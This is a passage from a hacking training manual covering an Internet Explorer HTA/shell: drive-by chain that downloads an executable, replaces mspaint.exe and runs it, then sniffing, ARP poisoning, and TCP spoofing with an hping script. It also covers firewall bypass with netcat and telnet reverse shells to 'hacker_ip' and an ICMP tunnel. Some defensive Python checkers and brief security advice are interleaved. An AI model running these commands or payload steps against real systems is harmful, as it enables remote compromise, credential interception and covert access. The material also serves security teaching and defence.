If this HTML page is opened remotely with IE's default settings, the execution of the ActiveX is not authorised. However, if the page is opened locally, IE displays a warning that falls far short of the real effect the script will have on your system:
Beware of this type of alert: some of IE's vulnerabilities can lead it to believe that a script belongs to the local zone when it is in fact on the Internet.
Security
To avoid this type of attack (very often used by spyware), the thing to do is to configure the Internet Explorer options properly, or simply to change browser, because ActiveX only works with IE. Note that IE works with a zone system in which various rights can be defined. There is an "Internet" zone and a "Local Intranet" zone, as can be seen below:
Each of these zones can be configured independently. Generally, the "Local Intranet" zone will be less restrictive than the "Internet" zone, which is often the more dangerous one. It is advised to deactivate ActiveX execution by clicking on "Custom Level".
B) .hta loopholes
This type of loophole mainly affects Microsoft's Internet clients, especially Internet Explorer and Outlook Express. The idea is to have them execute arbitrary code through JavaScript and VBScript. In theory, the browser's default settings forbid the execution of potentially hostile code coming from the Internet or from a zone not considered safe. However, executing this code locally (for example from an HTML page in the file history) is entirely possible, as the security policy there is much less restrictive. HTA files are Windows help files and are in fact compressed HTML files; they can therefore contain JavaScript or VBScript code. As they are executed locally on the machine, the interpreted code is also considered local, and the security options are therefore much less restrictive. The principle of the attack is to have the web browser execute JavaScript code that forces the local download of an HTA file and its opening, so that it executes VBScript code locally, intended to download and then execute a virus; all of this without the user's intervention, of course. One last problem remains: with the default security restrictions, it is not possible, even locally, to execute a program without asking for the user's authorisation. We will therefore use another loophole (the shell loophole), which can start a program on the system by associating it with a file to open. Instead of simply downloading the virus, we will overwrite an existing binary on the system and start it by asking to open a file with which it is associated: so it is the virus, having replaced the original binary, that is started.
Shell vulnerability
shell: is a protocol that can be used in a URL to open any folder or file on the system.
In the Start > Run window, type in the following commands:
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools
This type of command can be given to the web browser so that it executes the associated action. Place the following code in an HTML page (replace Windows with whatever is appropriate on your machine):
This vulnerability can be used to force IE to open a file with the program associated with its extension. Copy a bmp picture renamed hack.bmp into your Windows directory and put this script in an HTML page; the mspaint.exe program will then be started:
src='shell:windows\hack.bmp'
name="x"
Taking advantage of the hta loophole: Let us summarise the attack procedure:
Hostile JavaScript code:
1. Download and execution of a .hta containing VBScript code, via hostile JavaScript code (attack.htm file)
Hostile .hta:
2. Download of an executable which then overwrites mspaint.exe
3. Download of a bmp picture into the Windows directory
4. Request to open the picture via the shell loophole, forcing the execution of the file renamed mspaint.exe
On the www.thehackademy.net website, you will find a directory with all the files intended to take advantage of this type of vulnerability:
attack.htm: the hostile JavaScript code
EXPLOIT.CHM: the hostile chm
exploit.exe: the executable to be started by the web browser
hack.bmp: the picture to copy onto the system
The JavaScript code intended to download the .hta:
The VBScript code contained in the .hta. Once again, replace the Windows directory in this code with whatever is appropriate on your system (windows or winnt):
This HTML code will have to be compiled into .hta format. To do this, you can use the HTML Help Workshop program. Create a new project by selecting the "new" button:
The wizard asks for the location and the name of the new project:
Select an htm-type file as the project source:
Give it the exploit.htm file whose code was given above:
Finally, you can compile the project with the File -> Compile button; the htm file is then automatically generated in the directory where you saved the project. Once all the files are ready, copy the 4 files mentioned above into a web server directory. You then only have to point your web browser at the attack.htm page and the executable will be opened automatically.
CHAPTER III NETWORK VULNERABILITIES
1. Network Sniffing
A) Theoretical Approach
Sniffing is a spying technique which consists in copying the information contained in network packets without modifying their transport or their shape. When a machine A contacts a machine C, data transits through an intermediate machine B.
A -----> B -----> C
To reach C, A must have the packet transit through B. B could be controlled by a hacker, who could then maliciously pick up the data transiting between A and C and keep a copy of it for later analysis.
Sniffing makes it possible to pick up the data that makes up the network packets, i.e. the various fields set in the packets (source IP address, destination IP address, flags, etc.), as well as the payload itself (web pages' source code, logins and passwords, commands sent to a server, etc.).
The reason sniffing exists is the security weakness of the vast majority of protocols. The confidentiality of data transmitted with the most common protocols (TCP, HTTP, FTP, SMTP, ...) is not ensured because these communications are not encrypted. In some network environments, it is not even necessary to be part of the relay system (router, gateway, etc.) to undertake network sniffing...
Network environments: simplicity and limits of sniffing
In some network environments, it is not necessary to be in control of the relay machine to spy on the whole data flow. This is for example the case for network architectures structured around a HUB. The whole network created around a hub is vulnerable to a sniffing-type technique. All packets emitted on the network are broadcast to all the systems present. By analysing the destination MAC address, the system receiving the packet decides whether this packet is destined to it or must be dropped. However, on a hub network, this method is limited to the zones belonging to the same network segment.
Here, machine 1 sends a packet on the network (its destination is of no relevance to us). To relay it, the HUB repeats it to all the other machines of the network.
On this diagram, machine 2 could be the hacker's. It could then spy on all the network traffic of all the machines linked to the HUB, because all packets are repeated to it.
Here, the connection between the router and machine 3 cannot be sniffed by the rest of the network.
It is to be noted that the same network architecture could be created not around a hub but around a switch: this is an intelligent hub which stores in a table the MAC address and the Ethernet port number of each machine connected to it. It will then not broadcast the emitted packets but consult its table to determine on which Ethernet port it must send the packet.
• Network overloading is much less frequent and the network traffic itself is minimised.
• It is in theory no longer possible to sniff transiting connections on the LAN.
Practical Approach: installation of a sniffer
The reference for sniffers remains Ethereal, on both Windows and Linux, which includes a very capable analysis system for transiting packets. You will find this tool at: http://www.ethereal.com. You will also have to install the WinPcap library, which enables sniffing on Windows. You will find it at http://winpcap.polito.it.
Practical Approach: using a sniffer
We will start by doing raw sniffing sessions before we look at the powerful capture options.
1. Click on Capture
2. Click on Start.
A configuration window for the capture session opens. Among the various functions at hand, please note that you can specify in “Interface” the device to initialise. If you have several network cards, you can sniff the traffic on the card of your choice. Among the other options worth modifying, we should note “Display Options” and “Capture Limits”. To follow the sniffing of packets in real time, activate the options "Update list of packets in real time" and "Automatic scrolling in live capture". For your first try, activate the following options:
• Capture packets in promiscuous mode.
• Update list of packets in real time.
• The 3 options of "Name resolution".
NB: By default, a card will only keep the packets addressed to it; the others are discarded. To read packets destined to other computers, the hacker will have to put the card into a special mode called “promiscuous mode”. From then on the card will pick up all packets. It is however important to note that, since the card must be handled at a very low level for this change of operating mode, administrator privileges are necessary.
The capture status window indicates how many packets have already been sniffed, as well as the most common protocols to which these packets belong. It is also from this window that the capture session is stopped.
Using the "Follow TCP Stream" option
The "Follow TCP Stream" option can isolate a “conversation”, i.e. an exchange of data between two specific machines. So if, in the results of your capture session, you wish to zoom in quickly on one communication, do as follows:
1. Select a packet emitted from one machine to another. For example, click on the line corresponding to a packet emitted from machine A to B.
2. Right-click
3. Click on "Follow TCP Stream"
4. A new window opens and all it contains is the data exchange that has taken place between the two machines. A colour code distinguishes the data belonging to each machine.
5. At the bottom of the software's main window, in the “Filter” zone, the filtering expression is displayed that narrows the display to the exchange of interest to us. A good mastery of this software is essential to fully understand the meaning of this filter. In the present case, this is not necessary.
Using the filters
As seen previously, filters allow you to discriminate among information that has been captured or that is being captured. You can create filtering options with the software's designated interface:
1. In the software, click on the "Edit" tab,
2. Then, click on "Display Filters",
3. A window then opens which allows you to create filters.
We will see, with several specific examples, how to manage your filters efficiently.
Example 1: Filtering only HTTP packets.
1. In the "Ethereal: Edit Display Filter List" window, click on "Add Expression",
2. A window then opens which lists all protocols recognised by the software,
3. Go to HTTP,
5. Click on HTTP. It is not necessary to go to the “Relation” column. We will see in a later example how this column will be of use to us.
6. Click on "Accept",
7. You return to the Filter Management window. In “Filter String”, “http” should be displayed.
8. Give a name (“Filter Name”) to this filter. You can give “http” as a name if you want it to be evocative.
9. Click on "New",
10. A new filter, the one you have just created, has been added to your list of filters.
11. Click on "Save" then on "Close".
You have just created a new filter. In your future captures, you will be able to apply it in the following manner:
1. Start a new capture,
2. Click on the Filter button at the bottom of the software,
3. Select the appropriate filter,
4. Click on "Apply".
However, do bear in mind that filters are only used to discriminate the information that is displayed, for better visibility. In a capture, Ethereal will still pick up all packets. This is in no way an inconvenience, for it will enable you to return to a complete display of the information.
Let us now study a second, slightly more complex example of filter creation.
Example 2: filtering by IP addresses.
What we would like to do this time round is to visualise only the network packets specific to one IP address. We will suppose that you wish to filter only the network packets emitted towards IP address 125.125.125.125.
1. In the "Ethereal: Edit Display Filter List" window, click on "Add Expression",
2. A window then opens which lists all protocols recognised by the software,
3. Click on "IP" in the list, then in the "Relation" column, click on the double equals sign,
4. Enter IP address 125.125.125.125 in the appropriate "Value (protocol)" slot,
5. Click on "Accept",
6. Give a name to the filter, and click on "New",
7. Then click on "Save" and "Close",
8. Start a new capture,
9. Click on the Filter button at the bottom of the software,
10. Select the appropriate filter,
11. Click on "Apply",
12. Open telnet.exe in the following manner: go to “Start", then "Run" and type telnet 125.125.125.125,
13. Validate with "OK",
14. On the main Ethereal window only the information relative to your connection attempt towards 125.125.125.125 is displayed (and no other information).
Security
Sniffing is in fact just a passive way of listening to transiting traffic, so it is difficult to establish security solutions that are really efficient. It is therefore strongly recommended to always encrypt communications so that transiting data remains confidential.
2. Network Spoofing
A) Presentation
IP spoofing is not actually an attack in itself, but can be used in many other intrusion or information gathering techniques (see Idle host scanning). Spoofing is a technique that exploits the existing “network trust relations” between various machines. We will take advantage of the fact that IP:
• is one of the most widely used protocols.
• is an unreliable, connectionless network protocol: it keeps no track of packets that have already been transmitted, nor of those that are still to come.
• does not in any way handle packet security or confidentiality; this role is left to the upper layers.
IP is often coupled with the TCP protocol, which gives it the reliability that it otherwise lacks. TCP is a “connected” protocol and, before being able to exchange information, the machines concerned have to establish a connection (3-way handshake). This reliability is ensured in two ways:
– Sequencing.
– Acknowledging.
B) Establishing a TCP connection
As mentioned previously, in order to exchange information, two machines must first establish a connection (TCP in this case). To illustrate this technical aspect, we are going to use Ethereal, which enables us to sniff packets transiting through a network interface. In the present case, let us consider a “telnet” connection between two machines. Machine A does a telnet to machine B on port 6666...
This handshake takes place as follows:
First step
Machine A sends a packet to request the establishment of a connection to machine B.
Illustration 1: SYN
Each packet (or datagram) has what is called a header, laid out in 32-bit words. It contains various pieces of information, and these are the ones of interest to us:
• A “flag” system that determines what the packet corresponds to. In our case the packet contains a set SYN “flag” (fixed at 1).
• A sequence number (SEQ) created randomly by the kernel.
Second step
Illustration 2: SYN/ACK
To this request from machine A, B answers with a SYN/ACK, meaning that this time the packet sent by B to A has two bits set to 1: the SYN bit and the ACK bit. It is then machine B's turn to send a sequence number (SEQ), also created randomly, and also an ACK number which is the sequence number sent by machine A + 1.
Third step
Illustration 3: ACK
To conclude this connection, machine A, in response to the SYN/ACK sent by B, sends an ACK back to it (only the ACK bit is set). The packet still contains an ISN and an ACK; the value of the ISN is the ACK number of the previous packet sent by B, and the ACK is the sequence number of the previous packet sent by B + 1 (during the connection initialisation). Later on, the ACK sent by a local machine to a remote machine is made up of the sequence number sent by the remote machine in its last packet, to which is added the number of data bytes received during this transmission.
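The three relations just described (the SYN/ACK acknowledges the client's ISN + 1, the final ACK carries that value as its sequence number and acknowledges the server's ISN + 1, and later acknowledgements add the bytes received) can be checked mechanically. The following Python is an added example, not code from this booklet: it models the segments with constructed values (the server ISN 1442628982 is the one quoted later in this chapter; the client ISN and the addresses are made up) and reports any packet whose numbers do not fit, which is exactly what a packet forged without having seen the SYN/ACK fails.

```python
from dataclasses import dataclass
from typing import List, Optional

# TCP flag bits as they appear in the header's flags field
FIN, SYN, ACK = 0x01, 0x02, 0x10
MOD32 = 1 << 32  # sequence and acknowledgement numbers wrap modulo 2^32


@dataclass
class Segment:
    """The header fields of one TCP segment that the handshake rules depend on."""
    src: str
    dst: str
    flags: int
    seq: int
    ack: int
    data_len: int = 0


def expected_ack(seq: int, data_len: int, flags: int) -> int:
    """Acknowledgement number the receiver must send back for a segment: the
    sender's sequence number plus the bytes received, where a SYN or a FIN each
    occupy one unit of sequence space (hence ISN + 1 during the handshake)."""
    consumed = data_len + (1 if flags & SYN else 0) + (1 if flags & FIN else 0)
    return (seq + consumed) % MOD32


def check_handshake(segs: List[Segment]) -> Optional[str]:
    """Validate the SYN, SYN/ACK, ACK relations between the first three segments.

    Returns None when the exchange is consistent, otherwise a short reason.
    These are the numbers a sniffer sees and a spoofer must reproduce."""
    if len(segs) < 3:
        return "fewer than three segments"
    syn, synack, ack = segs[:3]
    client, server = syn.src, syn.dst

    if syn.flags != SYN:
        return "first segment is not a pure SYN"
    if synack.flags != SYN | ACK or (synack.src, synack.dst) != (server, client):
        return "second segment is not a SYN/ACK from the server"
    want = expected_ack(syn.seq, 0, SYN)
    if synack.ack != want:
        return f"SYN/ACK acknowledges {synack.ack}, expected client ISN + 1 = {want}"
    if ack.flags != ACK or (ack.src, ack.dst) != (client, server):
        return "third segment is not a pure ACK from the client"
    if ack.seq != synack.ack:
        return f"ACK carries seq {ack.seq}, expected {synack.ack} (the number the server acknowledged)"
    want = expected_ack(synack.seq, 0, SYN | ACK)
    if ack.ack != want:
        return f"ACK acknowledges {ack.ack}, expected server ISN + 1 = {want}"
    return None


if __name__ == "__main__":
    # Constructed handshake: A = 192.168.0.2, B = 192.168.0.66 (addresses reused
    # from this chapter), client ISN 1000 made up, server ISN from the capture.
    a, b = "192.168.0.2", "192.168.0.66"
    good = [
        Segment(a, b, SYN, 1000, 0),
        Segment(b, a, SYN | ACK, 1442628982, 1001),
        Segment(a, b, ACK, 1001, 1442628983),
    ]
    print("consistent handshake:", check_handshake(good))
    # A blind spoofer never sees the SYN/ACK, so its ACK number is a guess.
    blind = good[:2] + [Segment(a, b, ACK, 1001, 1442628990)]
    print("blind guess:", check_handshake(blind))
```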
C) The attack
Description
We will try to establish a spoofed connection on a network machine by usurping existing IP trust relations:
• First, a machine must be found that the target machine trusts, since the authentication of that machine is done from its address.
• Once this information is obtained, the authenticated machine must be made “mute” (to prevent it from answering the target machine).
• Then the sequence number expected by the target machine has to be determined.
• Once that is done, we can start sending packets with the IP address of the machine that we have “withdrawn” from the discussion.
The main problem with spoofing is that it is a so-called “blind” attack. It is not the machine itself that is authenticated but the packets that the victim machine receives. This means that the packets emitted by the target machine are not received by the attacker but are quite simply lost (as the destination machine is “not able to answer”). So the attacker does not have the information sent back by the target, and therefore does not have the sequence numbers of the packets sent back by this machine. That is why this is called a “blind” attack, and it is also why it is in fact impossible to carry out. Why is that?
To pass for the authorised machine in the eyes of the target machine, packets have to be “forged” (using Excalibur Packet, for example); and these packets must of course present, instead of the attacking machine's IP address, the address of the authorised machine now made “mute”. But the packets must also present sequence numbers corresponding to the exchange that the target machine believes it is having with a trusted machine. As the packets emitted by the target machine are not received by the attacker, the latter has no way of determining the sequence number sent by the target machine, and therefore the sequence number that this machine will expect in response to the last packet it has sent.
This would be possible if sequence numbers were generated in a foreseeable manner; however that is not the case, at least for systems such as BSD, SUN, Linux, or more generally UNIX. These various OS have a sequence number generation system that makes these numbers totally unforeseeable (because they are far too random). In the case of Microsoft, the latest studies of the problem pointed to the fact that the sequence numbers generated by Windows are linear and thus easily predictable, making the machines using them particularly vulnerable to this type of attack.
Example
As seen previously, blind spoofing is of no interest because it is almost impossible to carry out. The only solution is therefore to use Non Blind Spoofing (NBS). To do this, the attacker first has to get hold of a router or of a machine on a local network built around HUBs (switches only deliver packets to the machines concerned, so we would find ourselves in a blind spoofing situation again).
The methodology of this type of attack remains standard:
• Sniff the packets transiting between two machines with the help of Ethereal. That way, we will be able to obtain the sequence numbers sent by the target machine to the machine whose identity we are going to usurp.
• “Forge” packets with the same header as the packets sent by the spoofed machine (that is, with the spoofed machine's IP and with a sequence number corresponding to the one the target machine expects to receive).
• Establish a connection.
In our case, we are going to operate differently and use ARP poisoning... Let us take a machine A, a machine B and a machine C. We know that a “trust relation” exists between machine B and machine C; however machine B systematically “drops” all packets coming from machines other than machine C.
Our machine A will first carry out “ARP poisoning” on machine B, with the aim of corrupting its ARP cache. To do this, we are going to send packets of the “arp reply” type to machine B with the “arp poison” program. This way, in machine B's ARP cache, the IP address of machine C will be associated with the MAC address of machine A, and so when a packet leaves machine B for machine C, it is actually sent to machine A (our attacking machine). So we are no longer in a case of blind spoofing, since we are going to be able to recover (still using Ethereal) the packets that machine B believes it is sending to machine C. With the help of the hping program, which can be downloaded from http://www.hping.org, we are going to simulate a TCP-type connection on port 2222 of machine B. We can automate this approach with the following shell script:
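Seen from the defender's side, the poisoning just described leaves three traces on the wire: ARP replies nobody asked for, an IP address whose hardware address changes, and one MAC answering for two addresses. The Python below is an added example (not code from this booklet or from the arp poison tool) that applies those three checks to a constructed sequence of ARP events; 192.168.0.2 for machine C is taken from the script that follows, while 192.168.0.77 for machine A and both MAC addresses are assumed.

```python
from typing import Dict, FrozenSet, List, Optional, Set, Tuple

# One ARP event as a monitoring tool would see it on the wire:
# ("request", target_ip, None) or ("reply", sender_ip, sender_mac)
ArpEvent = Tuple[str, str, Optional[str]]
Alert = Tuple[str, str]  # (kind, detail)


class ArpMonitor:
    """Tracks the IP-to-MAC bindings learned from ARP replies and flags the
    three signs of cache poisoning: a reply without a request, a binding that
    changes, and one MAC address answering for several IP addresses."""

    def __init__(self) -> None:
        self.bindings: Dict[str, str] = {}        # ip -> mac last seen in a reply
        self.pending: Set[str] = set()            # ips with an outstanding request
        self.reported: Set[FrozenSet[str]] = set()  # shared-MAC groups already flagged

    def observe(self, event: ArpEvent) -> List[Alert]:
        kind, ip, mac = event
        alerts: List[Alert] = []
        if kind == "request":
            self.pending.add(ip)
            return alerts
        mac = (mac or "").lower()
        # 1. gratuitous reply: no request for this ip is outstanding
        if ip in self.pending:
            self.pending.discard(ip)
        else:
            alerts.append(("unsolicited", f"reply for {ip} from {mac} without a request"))
        # 2. binding change: the ip now claims a different hardware address
        known = self.bindings.get(ip)
        if known is not None and known != mac:
            alerts.append(("changed", f"{ip} moved from {known} to {mac}"))
        self.bindings[ip] = mac
        # 3. one MAC owning several ips (the attacker's own plus the spoofed one)
        owners = frozenset(i for i, m in self.bindings.items() if m == mac)
        if len(owners) > 1 and owners not in self.reported:
            self.reported.add(owners)
            alerts.append(("shared_mac", f"{mac} answers for {sorted(owners)}"))
        return alerts


def analyze_arp(events: List[ArpEvent]) -> List[Alert]:
    """Run a whole sequence of ARP events through a fresh monitor."""
    mon = ArpMonitor()
    alerts: List[Alert] = []
    for ev in events:
        alerts.extend(mon.observe(ev))
    return alerts


# Constructed sample following the text's scenario: machine A (192.168.0.77,
# assumed) and machine C (192.168.0.2, from the script below) answer normal
# requests from B, then A sends a reply claiming C's address with its own MAC.
SAMPLE_EVENTS: List[ArpEvent] = [
    ("request", "192.168.0.77", None),
    ("reply", "192.168.0.77", "de:ad:be:ef:00:01"),   # A, legitimate
    ("request", "192.168.0.2", None),
    ("reply", "192.168.0.2", "00:11:22:33:44:55"),    # C, legitimate
    ("reply", "192.168.0.2", "de:ad:be:ef:00:01"),    # poisoned reply from A
]

if __name__ == "__main__":
    for kind, detail in analyze_arp(SAMPLE_EVENTS):
        print(f"[{kind}] {detail}")
```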
#!/bin/sh
# SYN from the spoofed address (machine C) to port 2222 of machine B
/usr/sbin/hping -a 192.168.0.2 -p 2222 -s 2110 -S -M 33 -c 1 192.168.0.66
# read the ACK number to send: the sequence number of B's SYN/ACK (seen in Ethereal) + 1
read u
# ACK completing the handshake
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -M 34 -c 1 192.168.0.66
# PSH/ACK carrying 6 bytes of data taken from the file "data"
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -P -M 34 -c 1 -d 6 -E data 192.168.0.66
To make things clearer, we are going to describe the options used in this script:
-a : Address of the spoofed machine.
-p : Destination port of the packet.
-s : Source port used by the emitting machine.
-S : SYN flag set.
-M : Sets the sequence number sent by the emitting machine.
-c : Number of packets sent.
-A : ACK flag set.
-L : Sets the ACK number.
-P : PSH flag set.
-d : Specifies the size of the data sent.
-E : Takes the data from a file.
1. As seen previously, machine A is going to send a SYN packet to machine B, using of course the address of the (spoofed) machine C to prevent our packet being “dropped” by machine B (and so not processed).
2. With the help of Ethereal we are going to recover the SYN/ACK packet that machine B sends on to machine C.
3. As ACK, we send back the sequence number sent by machine B incremented by 1.
Machine B: SEQ=1442628982 ------> Machine A
Answer: ACK=1442628983
Let us have a look at Ethereal... (figure 4) We can note that we have the same combination SYN, SYN/ACK, ACK, typical of an authorised connection. Bingo! The connection is now initialised.
Figure 4: Simulation of a connection
The case of the UDP protocol
Unlike TCP, UDP is a connectionless protocol, which makes it extremely easy to study (as well as to falsify). This protocol does not provide any error control, as it does not keep track of packets that have already been transmitted or of those that are yet to come. So the header of a UDP segment is a very simple one: it is made up of four fields, followed of course by the data:
• Source Port: This is the port number corresponding to the application emitting the UDP segment. This field constitutes a return address for the destination. It is optional, meaning that if the source port is not specified, the 16 bits of this field are set to zero, in which case the destination will not be able to answer (this need not be a problem, especially for one-way messages).
• Destination Port: This field contains the port corresponding to the application of the destination machine we are addressing.
• Length: This field specifies the total length of the segment, header included, and as the header has a length of 4 x 16 bits (or 8 x 8 bits), the length field has to be equal to or above 8 bytes.
• Checksum: This is a checksum computed so as to allow the integrity of the segment to be checked.
As UDP does not function at all like TCP, especially as far as sequence numbers are concerned, it is much easier to spoof, since we do not have to determine a valid sequence number to forge our spoofed packets. The operation remains the same: we forge packets with a spoofed address, which allows us to establish a connection with our target machine without having to determine “acknowledge” sequence numbers.
Security
Trust relations based on IP addresses can therefore not be considered safe, even though the exploitation techniques are difficult to apply. So you should prefer trust relations based on key-based authentication systems, such as those presented at the end of this training course, in the VPN section.
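The four fields described above, together with the length rule and the checksum, can be checked in a few lines. This Python parser is an added example, not code from this booklet: it decodes a UDP header, rejects a length field below 8 or beyond the bytes captured, and verifies the checksum over the IPv4 pseudo-header; the addresses 192.168.0.2 and 192.168.0.66 are reused from this chapter purely as constructed sample input.

```python
import socket
import struct
from dataclasses import dataclass

UDP_HEADER_LEN = 8   # four 16-bit fields
IPPROTO_UDP = 17     # protocol number placed in the IPv4 pseudo-header


@dataclass
class UdpHeader:
    src_port: int
    dst_port: int
    length: int
    checksum: int


def parse_udp(segment: bytes) -> UdpHeader:
    """Decode the four header fields and reject the malformations a consumer
    must refuse: a truncated header, a length field below 8, and a length field
    claiming more bytes than were actually captured."""
    if len(segment) < UDP_HEADER_LEN:
        raise ValueError(f"segment of {len(segment)} bytes is shorter than the 8-byte header")
    src, dst, length, csum = struct.unpack("!HHHH", segment[:UDP_HEADER_LEN])
    if length < UDP_HEADER_LEN:
        raise ValueError(f"length field {length} is below the header size")
    if length > len(segment):
        raise ValueError(f"length field {length} exceeds the {len(segment)} bytes captured")
    return UdpHeader(src, dst, length, csum)


def is_well_formed(segment: bytes) -> bool:
    """Convenience wrapper: True when parse_udp accepts the segment."""
    try:
        parse_udp(segment)
        return True
    except ValueError:
        return False


def _ones_complement_sum(data: bytes) -> int:
    """16-bit one's complement sum, the arithmetic used by the IP family checksums."""
    if len(data) % 2:
        data += b"\x00"               # an odd trailing byte is padded with zero
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return total


def udp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """UDP checksum over the IPv4 pseudo-header (source and destination address,
    protocol 17, UDP length) followed by the segment with its own checksum field
    taken as zero. A computed 0 is sent as 0xFFFF because 0 means 'no checksum'."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, IPPROTO_UDP, len(segment)))
    zeroed = segment[:6] + b"\x00\x00" + segment[8:]
    csum = 0xFFFF - _ones_complement_sum(pseudo + zeroed)
    return csum or 0xFFFF


def verify_udp(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """True when the segment parses and its checksum matches (or is absent)."""
    hdr = parse_udp(segment)
    if hdr.checksum == 0:             # sender chose not to checksum (legal over IPv4)
        return True
    return udp_checksum(src_ip, dst_ip, segment[:hdr.length]) == hdr.checksum


def build_udp(src_port: int, dst_port: int, payload: bytes, src_ip: str, dst_ip: str) -> bytes:
    """Assemble a checksummed segment; used here only to produce sample input."""
    length = UDP_HEADER_LEN + len(payload)
    draft = struct.pack("!HHHH", src_port, dst_port, length, 0) + payload
    csum = udp_checksum(src_ip, dst_ip, draft)
    return draft[:6] + struct.pack("!H", csum) + payload


if __name__ == "__main__":
    # Constructed sample: a 5-byte payload from 192.168.0.2:40000 to 192.168.0.66:53
    seg = build_udp(40000, 53, b"hello", "192.168.0.2", "192.168.0.66")
    print(parse_udp(seg))
    print("checksum ok:", verify_udp("192.168.0.2", "192.168.0.66", seg))
    print("after tampering:", verify_udp("192.168.0.2", "192.168.0.66", seg[:8] + b"jello"))
```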
3. Firewall Bypassing
A) Reverse connection
The aim of firewalls is to filter incoming or outgoing traffic to prevent an intruder from entering an internal system. Quite often, however, the existing rules are insufficient, and the firewall is then about as useful as if it did not exist. The first source of error is often not limiting the outgoing traffic, the idea being to allow users to make use of certain public services, especially http, smtp or pop3. Client stations within the company thus have access to various network services on the Internet. So the principle of these attacks will not be to ask the target machine to bind a shell on an arbitrary port, but rather to ask it to connect outwards, on ports authorised by the firewall, to the hacker's machine (or a machine controlled by the hacker), and to send back a command interpreter in this two-way communication channel. This technique can be used because a channel can have data circulating both ways and can be attached to any executable (such as a shell), whether at the client or at the server end. We will start by studying two techniques that can be used on Linux:
➢ The inverted telnet: The idea here is to create an inverted connection, meaning that it is the server that connects to the hacker's system. To do this, two distinct channels must be created: the hacker opens two listening ports on his system (using netcat for example), then asks his target to connect to each of these ports. The hacker can then write into the first netcat listener, and this data will be received by the remote system, interpreted by a shell, then sent back in the other channel, created by the second telnet session connected to the hacker's second netcat listener. On his machine, the hacker creates two listeners on ports 887 and 888 (with the help of netcat). The remote system connects to the two netcat listeners, piping the data received through the first channel to the shell and then piping the results to the second channel, with the command:
telnet hacker_ip 887 | /bin/sh | telnet hacker_ip 888
Hacker's machine: nc -l -v -n -p 887 (injection of commands into this channel) and nc -l -v -n -p 888 (reading of the results sent back by the remote system).
If the remote host runs an X server, it is then possible to ask it to send back an xterm to our system: this is an X console which will be displayed on the hacker's X server. First of all, the remote host has to be authorised to connect to the X server, with the command:
xhost +ip_de_l_distant_host
Then the server has to be asked to send this xterm back to the hacker's system. The command to be executed has the following form:
xterm -display pirate_ip:0.0
An xterm console belonging to the target server is then sent back, providing interactive access to the hacker.
In a much more generic way, on Windows and Linux, it is possible to use the netcat tool to carry out this type of operation, if it is present on the target system (or if it is possible to upload it). This tool can be given the -e option, which associates the channel with the binary specified with this option (cmd.exe on Windows, /bin/sh on Linux). On the hacker's side, a port is bound, to which the target will connect, with the command:
nc -l -v -n -p port
The target is asked to connect to the hacker and to send back a shell with the command:
nc hacker_ip port -e cmd.exe
B) Covert channel
Presentation
A covert channel is a method which consists in carrying one data flow inside another in order to make it more difficult to detect, with the aim of breaching firewalls. We are going to see several examples of its use, with the http and icmp protocols. We are going to make one data flow go through another.
Situation scenario: Using icmp
Let us consider machine A (ip: 192.168.0.2) and machine B (ip: 192.168.0.66). Let us start with a situation where we do not use any covert channel and let's see what Ethereal has to say about that.
Machine B
bash$ nc -l -p 6666 -e /bin/bash
Machine A
bash$ nc 192.168.0.66 6666
cat /etc/issue
Debian GNU/Linux 3.1 \n \l
We can clearly identify a tcp session corresponding to a shell. The information passes in the clear on the network. Our communication would be identified immediately by any reasonably conscientious administrator. Let's now make a small change. On machine B, we will do this:
Machine B
bash# iptables -A INPUT --proto tcp --source ! localhost -j DROP
The machine will thus no longer be able to receive tcp data from a non-local source.
Let's try to connect again from machine A.
Machine A
bash$ telnet 192.168.0.66 6666
Trying 192.168.0.66...
telnet: connect to address 192.168.0.66: connection timed out
bash$
The communication is not accepted; the packets are dropped. We are going to try to bypass the problem by using an icmp tunnel to send our data. We will use icmptunnel (available at: http://packetstormsecurity.org/crypt/vpn/icmptunnel013.tar.gz). An icmp tunnel between our two machines will be created. This diagram shows what is going to happen:
Installation of icmptunnel on the two machines (A and B):
bash$ wget http://packetstormsecurity.org/crypt/vpn/icmptunnel013.tar.gz
bash$ tar xvfz icmptunnel013.tar.gz
bash$ cd icmptunnel
bash$ make -f Makefile.tomas
We obtain an executable named “t”. This executable uses raw sockets, and will have to be started with root rights. On machine B, we are going to start an icmp tunnel (attached to a local port) towards machine A, and we are going to associate a shell with the local port. To do this, we proceed as follows:
Machine B
bash# ./t -S ICMP_ECHOREPLY -R ICMP_ECHO -L 7777 -i 15 -I 8 192.168.0.2
Information is displayed summing up the chosen options (icmptunnel is by default very “talkative”, which allows us to analyse everything that is happening. It is possible to make it “less talkative” by removing the -DDEBUG option from the makefile).
-S: specifies the type of icmp packet used when we send data through our channel. We choose packets of the echoreply type.
-R: specifies the type of icmp packet that we should receive through our pipe. We choose echo type packets, corresponding to packets of the echorequest type.
-L: the local port to be used.
-i: an identifier related to the tunnel. It is the tunnel identifier used by the target machine.
-I: the tunnel identifier used by our machine. For our two machines to be able to communicate through our tunnel, they must each have a tunnel identifier and it must be specified in both cases.
192.168.0.2: the target machine.
We will now attach a shell to our local port, as follows:
bash$ nc localhost 7777 -e /bin/bash
Now we will start our tunnel on machine A.
Machine A
bash# ./t -S ICMP_ECHO -R ICMP_ECHOREPLY -L 9999 -i 15 -I 8 192.168.0.66
And now we can connect to our local port via netcat:
bash$ nc localhost 9999
cat /etc/issue;
Debian GNU/Linux 3.1 \n \l
We were able to establish a connection to the shell started on the remote machine, in spite of the firewall. Let us now take a look at what Ethereal is seeing:
We can see that Ethereal has seen icmp type traffic go through. We can also see that the data has passed in the clear: icmptunnel is not very practical in the sense that the data is not encrypted.
Another example: using HTTP
Following the same principle, we are this time going to use the HTTP protocol (used by web servers). We will use the httptunnel program (available at: http://www.nocrew.org/software/httptunnel/httptunnel-3.0.5.tar.gz).
Installation on both machines:
